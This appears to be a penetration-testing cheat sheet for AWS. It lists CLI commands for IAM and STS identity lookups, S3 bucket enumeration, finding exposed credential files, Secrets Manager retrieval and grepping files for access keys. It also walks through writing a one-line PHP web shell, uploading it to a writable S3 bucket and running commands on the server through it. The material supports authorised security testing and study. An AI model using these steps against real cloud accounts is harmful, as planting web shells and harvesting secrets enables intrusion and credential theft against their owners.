AWS (Amazon Web Services) Pentesting
Last modified: 2022-11-22
AWS (Amazon Web Services) provide on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered pay-as-you-go basis.
Amazon Resource Names (ARNs)
# Format
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
Identify and Access Management (IAM)
# Add credentials
# This will add entries to .aws/config or .aws/credentials in user's home directory.
# <profile-name> is arbitrary.
aws configure --profile <profile-name>
# List credentials
aws configure list --profile <profile-name>
# Find the account id belonging to an access key (access key starts with "AKIA")
aws sts get-access-key-info --access-key-id AKIAQ31B...
# Determin the username the access key you're using belogns to
aws sts get-caller-identity --profile <profile-name>
# List all EC2 instances running in an account
aws ec2 describe-instances --output text --profile <profile-name>
# List all EC2 instances running in an account in a dirrerent region
aws ec2 describe-instances --output text --region us-east-1 --profile <profile-name>
Amazon S3
A public cloud storage resource available in Amazon Web Services (AWS) Simple Storage Service (S3), an object storage offering.
-
S3 Bucket URLs Commonly Used
If you find images in target website, open the images new tab and check the URLs if they're stored in Amazon S3.
The following URLs templates are often used.http://example-assets.s3.amazonaws.com http://s3.amazonaws.com/example-assets/ http://example-www.s3.amazonaws.com http://s3.amazonaws.com/example-www/ http://example-public.s3.amazonaws.com http://s3.amazonaws.com/example-public/ http://example-private.s3.amazonaws.com http://s3.amazonaws.com/example-private/ http://example-bucket-zero.s3.amazonaws.com http://s3.amazonaws.com/example-bucket-zero/ http://example-bucket-one.s3.amazonaws.com http://s3.amazonaws.com/example-bucket-one/ http://example-bucket-two.s3.amazonaws.com http://s3.amazonaws.com/example-bucket-two/
-
XML Content Discovery
Accessing the S3 Bucket URL, if the contents of XML,
... <Contents> <Key>creds.txt</Key> ...
Retrieve the content by accessing to URL like https://vulnerable-assets.s3.amazonaws.com/creds.txt.
-
AWS CLI
First off, you may need to configure aws.
aws configure
# http://<bucket-name>.s3.amazonaws.com # List contents of a bucket aws s3 ls s3://<bucket-name>/ aws s3 ls s3://<bucket-name>/ --no-sign-request aws s3 ls s3://example.com # Specify the endpoint aws s3 --endpoint=http://example.com ls s3://example.com # Download files from s3 aws s3 cp s3://<bucket-name>/example.xml . # Upload files to s3 aws s3 cp ./example.txt s3://<bucket-name> # -------------------------------------------------------------- # List all S3 buckets in the AWS account you've added. aws s3 ls --profile PROFILENAME
-
Web Shell/Reverse Shell with CLI
-
Prepare Web Shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
-
Upload the Web Shell
aws s3 cp ./shell.php s3://example.com # or aws s3 --endpoint=http://s3.example.com cp ./shell.php s3://example.com
Check if uploaded
aws s3 ls s3://example.com # or aws s3 --endpoint=http://s3.example.com ls s3://example.com
-
Execute Commands via Request
Send request to http://example.com/shell.php?cmd=whoami in browser or using curl.
-
Secrets Manager
# List secrets
aws secretsmanager list-secrets --profile <profile-name>
# Get secret value
# "secret-id" is the Name of the SecretList when run 'list-secrets'.
aws secretsmanager get-secret-value --secret-id <secret-id> --profile <profile-name>
# Help
aws secretsmanager help
Get Access Keys From Files
# Access Key ID starts with "AKIA"
grep -e AKIA ./*